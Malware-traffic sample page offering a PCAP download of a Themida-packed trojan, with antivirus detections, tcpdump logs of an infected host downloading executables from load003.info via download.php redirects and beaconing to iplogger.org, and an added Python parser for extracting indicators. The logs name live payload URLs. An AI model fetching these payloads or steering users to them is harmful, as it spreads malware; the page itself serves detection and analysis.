Themida Malware Trojan PCAP File Download Traffic Sample

Download Attachments

  • pcap load003 (29 MB). Date added: February 10, 2020 1:07 am. Added by: admin. Downloads: 113

Antivirus detections for the sample:

Vendor               Detection
Acronis              Suspicious
Ad-Aware             Trojan.GenericKD.33042201
AegisLab             Trojan.Win32.Stralo.a!c
Alibaba              Packed:Win32/Themida.9b7a1eb0
ALYac                Trojan.GenericKD.33042201
SecureAge APEX       Malicious
Arcabit              Trojan.Generic.D1F82F19
Avast                Win32:Trojan-gen
AVG                  Win32:Trojan-gen
Avira (no cloud)     HEUR/AGEN.1038489
BitDefender          Trojan.GenericKD.33042201
CAT-QuickHeal        Trojandownloader.Stralo
CrowdStrike Falcon   Win/malicious_confidence_100% (W)
Cybereason           Malicious.45a019
Cylance              Unsafe
Cyren                W32/Trojan.KCYB-5076

2020-02-08 20:29:34.973179 IP 192.168.86.25.56270 > 47.74.39.61.80: Flags [P.], seq 926682144:926682556, ack 616271298, win 16425, length 412: HTTP: GET /download.php?file=marg.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:29:35.825646 IP 192.168.86.25.56271 > 47.74.39.61.80: Flags [P.], seq 2041650194:2041650707, ack 2974115500, win 16425, length 513: HTTP: GET /downfiles/marg.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive
Range: bytes=88624-
Unless-Modified-Since: Sat, 08 Feb 2020 07:20:39 GMT
If-Range: "207000-59e0b57d68e4c"

2020-02-08 20:31:40.028237 IP 192.168.86.25.56278 > 47.74.39.61.80: Flags [P.], seq 2788295783:2788296203, ack 1550571417, win 16425, length 420: HTTP: GET /download.php?file=intervpnmix3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:31:40.696479 IP 47.74.39.61.80 > 192.168.86.25.56278: Flags [P.], seq 1:265, ack 420, win 473, length 264: HTTP: HTTP/1.1 302 Found
Date: Sun, 09 Feb 2020 01:32:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: downfiles/intervpnmix3.exe
Content-Length: 0
Connection: close
Content-Type: text/html

2020-02-08 20:31:40.898683 IP 192.168.86.25.56279 > 47.74.39.61.80: Flags [P.], seq 4256677481:4256677893, ack 1750907471, win 16425, length 412: HTTP: GET /downfiles/intervpnmix3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:00.483694 IP 192.168.86.25.56280 > 88.99.66.31.443: Flags [P.], seq 2851029055:2851029171, ack 190420779, win 16425, length 116 (TLS client hello; SNI hostname visible in the payload: iplogger.org)
2020-02-08 20:32:00.517109 IP 192.168.86.25.56282 > 18.205.93.0.443: Flags [P.], seq 4200830805:4200830931, ack 4038506366, win 16425, length 126 (TLS client hello; SNI hostname visible in the payload: bitbucket.org)

2020-02-08 20:32:05.244099 IP 192.168.86.25.56285 > 47.74.39.61.80: Flags [P.], seq 1035006904:1035007323, ack 886778176, win 16425, length 419: HTTP: GET /download.php?file=intervpnmix2.ex HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:05.608904 IP 47.74.39.61.80 > 192.168.86.25.56279: Flags [P.], seq 8624445:8625737, ack 412, win 473, length 1292: HTTP
[1292 bytes of binary payload from the /downfiles/intervpnmix3.exe transfer on port 56279, omitted]

2020-02-08 20:32:05.916414 IP 47.74.39.61.80 > 192.168.86.25.56285: Flags [P.], seq 1:250, ack 419, win 473, length 249: HTTP: HTTP/1.1 200 OK
Date: Sun, 09 Feb 2020 01:32:53 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 25
Connection: close
Content-Type: text/html

This file does not exist!
2020-02-08 20:32:06.451307 IP 192.168.86.25.56286 > 47.74.39.61.80: Flags [P.], seq 1763241117:1763241379, ack 3225483362, win 16425, length 262: HTTP: GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:07.098850 IP 47.74.39.61.80 > 192.168.86.25.56286: Flags [P.], seq 1:436, ack 262, win 473, length 435: HTTP: HTTP/1.1 404 Not Found
Date: Sun, 09 Feb 2020 01:32:55 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1


404 Not Found

Not Found

The requested URL /favicon.ico was not found on this server.

2020-02-08 20:32:17.590997 IP 192.168.86.25.56287 > 47.74.39.61.80: Flags [P.], seq 104656042:104656461, ack 2932149013, win 16425, length 419: HTTP: GET /download.php?file=intervpnmix.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:23.439948 IP 192.168.86.25.56288 > 47.74.39.61.80: Flags [P.], seq 2789729861:2789730272, ack 3201016057, win 16425, length 411: HTTP: GET /downfiles/intervpnmix.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:24.157278 IP 192.168.86.25.56289 > 47.74.39.61.80: Flags [P.], seq 3393625816:3393626078, ack 2599973863, win 16425, length 262: HTTP: GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:28.821888 IP 192.168.86.25.56290 > 47.74.39.61.80: Flags [P.], seq 1837030566:1837030982, ack 3108693953, win 16425, length 416: HTTP: GET /download.php?file=intervpn.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:29.505196 IP 47.74.39.61.80 > 192.168.86.25.56290: Flags [P.], seq 1:261, ack 416, win 473, length 260: HTTP: HTTP/1.1 302 Found
Date: Sun, 09 Feb 2020 01:33:17 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: downfiles/intervpn.exe
Content-Length: 0
Connection: close
Content-Type: text/html

2020-02-08 20:30:51.206549 IP 192.168.86.25.57475 > 192.168.86.1.53: 34777+ A? bitbucket.org. (31)
2020-02-08 20:30:51.230165 IP 192.168.86.1.53 > 192.168.86.25.57475: 34777 3/0/0 A 18.205.93.1, A 18.205.93.0, A 18.205.93.2 (79)
2020-02-08 20:31:37.395447 IP 192.168.86.29.57989 > 192.168.86.25.2054: UDP, length 28
2020-02-08 20:32:00.291002 IP 192.168.86.25.61986 > 192.168.86.1.53: 65533+ A? iplogger.org. (30)
2020-02-08 20:32:00.316912 IP 192.168.86.1.53 > 192.168.86.25.61986: 65533 1/0/0 A 88.99.66.31 (46)
2020-02-08 20:32:00.334635 IP 192.168.86.25.54398 > 192.168.86.1.53: 32919+ A? bitbucket.org. (31)
2020-02-08 20:32:00.366011 IP 192.168.86.1.53 > 192.168.86.25.54398: 32919 3/0/0 A 18.205.93.0, A 18.205.93.1, A 18.205.93.2 (79)
2020-02-08 20:32:37.393250 IP 192.168.86.29.50869 > 192.168.86.25.2054: UDP, length 28
2020-02-08 20:33:20.056272 IP 192.168.86.25.58138 > 192.168.86.1.53: 545+ A? bitbucket.org. (31)
2020-02-08 20:33:20.079732 IP 192.168.86.1.53 > 192.168.86.25.58138: 545 3/0/0 A 18.205.93.1, A 18.205.93.0, A 18.205.93.2 (79)
2020-02-08 20:33:37.390751 IP 192.168.86.29.52712 > 192.168.86.25.2054: UDP, length 28
2020-02-08 20:34:37.391819 IP 192.168.86.29.61078 > 192.168.86.25.2054: UDP, length 28
2020-02-08 20:35:33.251100 IP 192.168.86.25.57487 > 192.168.86.1.53: 18385+ A? bitbucket.org. (31)
2020-02-08 20:35:33.273069 IP 192.168.86.1.53 > 192.168.86.25.57487: 18385 3/0/0 A 18.205.93.1, A 18.205.93.0, A 18.205.93.2 (79)
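As an added example (this script is not part of the original post and not a tool the capture was made with), the following parser takes a tcpdump -A style excerpt like the one above and reconstructs the download chain a responder would want to write down: it pairs each GET with the response seen on the same client port, resolves the relative Location that download.php returns in its 302 (downfiles/intervpnmix3.exe) against the request URL the way the client did, flags the Range header on /downfiles/marg.exe as a restarted download rather than a fresh one, treats the HTTP 200 body "This file does not exist!" as a miss rather than a payload, and joins the A? questions to their answers by query id. The sample input is constructed from the summary lines above with the seq/ack fields and the raw byte dumps removed; the regex shapes, the field names and the iocs() summary are this example's own choices.

```python
import re
from urllib.parse import parse_qs, urljoin, urlparse

# Constructed sample, abridged from the capture above: tcpdump summary lines with the
# seq/ack fields trimmed, only the headers that matter, and no raw byte dumps.
SAMPLE = """\
2020-02-08 20:29:35.825646 IP 192.168.86.25.56271 > 47.74.39.61.80: Flags [P.], length 513: HTTP: GET /downfiles/marg.exe HTTP/1.1
Host: load003.info
Range: bytes=88624-

2020-02-08 20:31:40.028237 IP 192.168.86.25.56278 > 47.74.39.61.80: Flags [P.], length 420: HTTP: GET /download.php?file=intervpnmix3.exe HTTP/1.1
Host: load003.info

2020-02-08 20:31:40.696479 IP 47.74.39.61.80 > 192.168.86.25.56278: Flags [P.], length 264: HTTP: HTTP/1.1 302 Found
Location: downfiles/intervpnmix3.exe
Content-Length: 0

2020-02-08 20:32:05.244099 IP 192.168.86.25.56285 > 47.74.39.61.80: Flags [P.], length 419: HTTP: GET /download.php?file=intervpnmix2.ex HTTP/1.1
Host: load003.info

2020-02-08 20:32:05.916414 IP 47.74.39.61.80 > 192.168.86.25.56285: Flags [P.], length 249: HTTP: HTTP/1.1 200 OK
Content-Length: 25

This file does not exist!
2020-02-08 20:32:00.291002 IP 192.168.86.25.61986 > 192.168.86.1.53: 65533+ A? iplogger.org. (30)
2020-02-08 20:32:00.316912 IP 192.168.86.1.53 > 192.168.86.25.61986: 65533 1/0/0 A 88.99.66.31 (46)
2020-02-08 20:32:00.334635 IP 192.168.86.25.54398 > 192.168.86.1.53: 32919+ A? bitbucket.org. (31)
2020-02-08 20:32:00.366011 IP 192.168.86.1.53 > 192.168.86.25.54398: 32919 3/0/0 A 18.205.93.0, A 18.205.93.1, A 18.205.93.2 (79)
"""

PKT_RE = re.compile(r"^(?P<ts>\S+ \S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
                    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$")
HDR_RE = re.compile(r"^([A-Za-z-]+): (.*)$")
REQ_RE = re.compile(r"HTTP: (GET|POST|HEAD) (\S+) HTTP/1\.[01]$")
RESP_RE = re.compile(r"HTTP: HTTP/1\.[01] (\d{3}) ")
DNS_Q_RE = re.compile(r"^(\d+)\+? A\? (\S+?)\.? \(\d+\)$")
DNS_A_RE = re.compile(r"^(\d+) \d+/\d+/\d+ (.*) \(\d+\)$")

def parse_packets(text):
    """Each tcpdump summary line starts a packet; the lines under it are its payload text."""
    packets = []
    for line in text.splitlines():
        if (m := PKT_RE.match(line)):
            packets.append({**m.groupdict(), "lines": []})
        elif packets:
            packets[-1]["lines"].append(line)
    return packets

def split_http(lines):
    """Headers up to the first blank line, body after it; byte-dump noise is skipped."""
    cut = lines.index("") if "" in lines else len(lines)
    headers = [m.groups() for m in map(HDR_RE.match, lines[:cut]) if m]
    return {k.lower(): v for k, v in headers}, "\n".join(lines[cut + 1:]).strip()

def http_transactions(packets):
    """Pair each request with the response seen on the same client ip:port."""
    pending, txns = {}, []
    for p in packets:
        if (m := REQ_RE.search(p["rest"])):
            headers, _ = split_http(p["lines"])
            url = f'http://{headers.get("host", p["dst"])}{m.group(2)}'
            # download.php?file=NAME names the payload; a Range header means the client
            # is restarting an interrupted fetch of that file, not downloading it fresh.
            txn = {"url": url, "status": None, "location": None, "body": "",
                   "requested_file": parse_qs(urlparse(url).query).get("file", [None])[0],
                   "resumed_from": headers.get("range")}
            pending[(p["src"], p["sport"])] = txn
            txns.append(txn)
        elif (m := RESP_RE.search(p["rest"])) and (p["dst"], p["dport"]) in pending:
            txn = pending.pop((p["dst"], p["dport"]))
            headers, txn["body"] = split_http(p["lines"])
            txn["status"] = int(m.group(1))
            if "location" in headers:
                # The 302 carries a relative Location (downfiles/x.exe): resolve it against
                # the request URL the way the client did to get the real payload URL.
                txn["location"] = urljoin(txn["url"], headers["location"])
    return txns

def dns_answers(packets):
    """Join A? questions to their answers by query id: name -> resolved IPs."""
    qname, answers = {}, {}
    for p in packets:
        if (m := DNS_Q_RE.match(p["rest"])):
            qname[m.group(1)] = m.group(2)
        elif (m := DNS_A_RE.match(p["rest"])) and m.group(1) in qname:
            ips = answers.setdefault(qname[m.group(1)], [])
            ips.extend(ip for ip in re.findall(r"A ([\d.]+)", m.group(2)) if ip not in ips)
    return answers

def iocs(text):
    """What a responder blocks or hunts for, derived from the capture text."""
    packets = parse_packets(text)
    txns = http_transactions(packets)
    final = [t["location"] or t["url"] for t in txns]  # follow the 302 to the payload URL
    return {"hosts": sorted({urlparse(u).netloc for u in final}),
            "payload_urls": sorted({u for u in final if u.lower().endswith(".exe")}),
            "resumed": [t["url"] for t in txns if t["resumed_from"]],
            "missing_files": [t["requested_file"] for t in txns
                              if t["status"] == 200 and "does not exist" in t["body"]],
            "dns": dns_answers(packets)}
```

Calling iocs(SAMPLE) yields load003.info as the only host, the two /downfiles/ executables as payload URLs, /downfiles/marg.exe as a resumed transfer, intervpnmix2.ex as a name the server did not have, and the resolved addresses for iplogger.org and bitbucket.org. On raw tcpdump -A output (rather than the cleaned text above) each header line's CR prints as a trailing "." that this parser does not strip, so either strip it beforehand or expect values like "load003.info." in the host field.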

Written By: admin

Leave a Reply